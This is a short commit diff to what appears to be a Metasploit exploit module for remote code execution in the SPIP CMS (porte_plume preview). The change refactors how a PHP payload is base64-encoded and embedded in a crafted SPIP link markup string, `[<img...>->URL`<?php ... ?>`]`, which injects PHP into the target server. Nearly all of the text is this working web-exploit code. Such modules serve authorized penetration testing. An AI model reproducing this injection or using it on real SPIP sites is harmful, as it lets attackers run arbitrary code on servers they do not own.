Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb

Chocapikk · jvoisin · web-flow · commit fdbf7dd3efe4 · 2024-08-20T18:54:03.000+02:00
Co-authored-by: Julien Voisin &lt;jvoisin@users.noreply.github.com&gt;
diff --git a/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb b/modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
@@ -104,13 +104,14 @@ def php_exec_cmd(encoded_payload)
         $c = base64_decode("#{encoded_clean_payload}");
         #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
     END_OF_PHP_CODE
-    return framework.encoders.create('php/base64').encode(shell)
+    return shell
   end
 
   def exploit
     print_status('Preparing to send exploit payload to the target...')
-    compacted_payload = target['Arch'] == ARCH_PHP ? framework.encoders.create('php/base64').encode(payload.encoded) : php_exec_cmd(payload.encoded)
-    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{compacted_payload} ?>`]"
+    phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
+    b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
+    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"
 
     Rex.sleep(0.5)
 
